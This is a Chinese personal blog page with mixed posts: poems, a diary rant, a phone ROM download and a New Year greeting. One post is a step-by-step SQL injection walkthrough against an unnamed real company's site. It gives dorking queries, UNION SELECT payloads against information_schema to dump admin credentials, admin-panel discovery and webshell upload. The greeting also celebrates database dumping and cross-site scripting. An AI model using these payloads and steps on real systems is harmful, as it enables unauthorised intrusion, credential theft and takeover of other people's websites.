George

孙将军,让自己先疯起来。
  • 联系George
  • 友情链接
  • 订阅
  • 私信
  • 存档
  • 随机文章

  • 等待

    阳光
    被挡在窗外
    教室中读书声
    朗朗
    有一种努力 叫做
    等待

  • 从此,没有星期天。

    天空黑了三年。
    直到
    我决定省略生命中的星期天。
    。。。。。。

  • 一次手注国内某学习机公司简单过程

    1.google hacking-----------------site:xxxxx.com  inurl:asp/php?id=

    2.'判断是否过敏。。

    3.And 1=1   and 1=2  

    4.Order by x--    x为数字,猜解有几个表段。。。

    5.猜解到x以后,记住x的值。。。。

    6.And 1=2 union select 1,2,3,4,5,....,x--

    7.页面会报错,并出现数字,假设初相的数字是5,那么这一步就这样做:(用user()替换第六步中的5,再次提交)。报错的页面5的位置,会出现被5所覆盖的字符串的内容。记录该内容,这里用^表示。

    8.再用version()替换刚才user()的位置,再次提交,目的是为了获取数据库的版本。报错的页面^的位置的内容会变为版本号码,例如5.0.27。

    9.用database()替换上一步中的version(),查看当前库的名字,记录为^^。

    10.MySQL5.0以上的版本添加了一个虚拟库information_schema,存储的是其他库的库名,表明,还有字段。

    11.And 1=2 1,2,3,4,table_name,6,.....,x空格from information_schema.tables where table_schema=^^--(这一步要将^^的内容转换成十六进制在提交),提交之后,页面就会显示出库^^中所有的表名。将^^--改为^^ limit 0,1--提交,之页面只显示管理员账户的表名,记录为^^^。下面提交的时候要记得将^^^转换为十六进制再提交。

    12.爆字段。And 1=2 1,2,3,4,column_name,6,.....,x空格from information_schema.columns where table_name=^^^limit 0,1--     提交,之后会爆出字段,记录为^^^^*。将limit 0,1改为limit 0,2再提交,可以再爆下一个字段^^^^&。

    13.爆字段。And 1=2 1,2,3,4,^^^^*,6,...,x from ^^ limit 0,1--  提交,爆出该字段中第一个用户帐号。同样,用And 1=2 1,2,3,4,^^^^&,6,...,x from ^^ limit 0,1--提交,爆出与帐号对应的内容。

    14.下面要找该网站的管理后台。。。有了帐号密码,再有后台登录URL,那么就可以进入后台了。:)。。。可以用啊D工具扫描后台,很容易的,你下载一个啊D,一看就会了。这里举个例子,一般后台的地址都是http://******.com/login.php之类的。。。之后用浏览器打开http://******.com/login.php,输入你爆出来的帐号和密码。。。。

    15.登陆成功以后,要找到网站后台可以上传的地方。

    在可以上传的地方,上传webshell。。。

    SQL

  • ZTE-V960新加坡版ROM一枚

           艿艿个熊,俄的ZTE-v960新加坡TMD真难伺候,俄刷遍天下所有无敌神ROM,距离感应器死活不工作。。所有技术与方案已经验证,都无法解决这一问题。据说有网友的此版大V刷2.3.7无鸭梨,不敢苟同;也许不是同一批的吧。。但是经过俄AgainX的总结,得出以下结论:


    ZTE U --V960新加坡版刷2.3.7距离感应器必死。。

     

    无耐不想把俄宝贵的时间浪费到修改ROM当中,还有99%的几率无果,就淘了一个绝对爽的2.3.5。。。。

     

    给尼下载地址,必死的速度。刷。http://115.com/file/aniwknix

     

    一会儿给尼上图。忘了说了,“尼玛俄是修改过主题和字体了。对了还有,尼玛俄这个可是

    高仿的4.0.3哦,尼玛可不要说是俄忽悠尼哦。尼玛。。木有尼玛了。。。。。。对了对

    了,尼玛不要问我有木有其它Bug哦,俄告诉尼这ROM全部正常哦。。。尼玛这个ROM

    可以稳定超频哦。。。尼玛什么的,自己去刷吧,刷了就知道有多少个尼玛想说了。。尼

    玛。。真的木有尼玛了。。。有俄也不说了。。有木有。。。”





    V960 V960ROM

  • 花式台球 最美的境界 Venom Trickshots 正片完整版(高清)

  • 爆了!牛人翻唱杰克逊经典歌曲beat it-都是逼的.

  • 你疯了。

    总结一下这几天的状态。。

    1、上网

    2、看电视剧

    3、上网

    4、看电视剧。

    5、上网

    6、看电视剧。

    7、@@@@@@@@@@@

    8、@@@@@@@@@@@@@@@

    9、@@

    ......

    .......

    1010、@@@@@@@@@@@@@@@@@@@@

    ....................

    ........

    2020、TMD,孙将军,你TMD简直疯了!!!没错,我就是疯了。疯的彻头彻尾,疯得侵入了骨头里。

    生活点滴

  • xiaohaizi.org在这里安家了

    一直漂泊的米今天在点点安家了……还有几个米,懒的动它,让它先流浪吧。自从上次服务器挂掉以后,一些心得与体会就写在了百度空间上,这里一篇,那里一句。在看了一个学哥的博客之后,发现点点网可以绑米了,很久前被邀请注册了点点,之后没有光顾。用了点点,省了空间,试了一下,速度不错。用来写一些技术心得或者生活点滴也是很好的。

    2 热度

  • 元旦快乐!

    #D仔:各位,新的一年2012马上就要到来了。D仔在这里祝大家元旦快乐,工作顺利!

    在2012这个很。黄。很。刁。的年份里,技术更牛X,脱裤更游刃,跨站更有余!!!

    生活点滴
下一页 →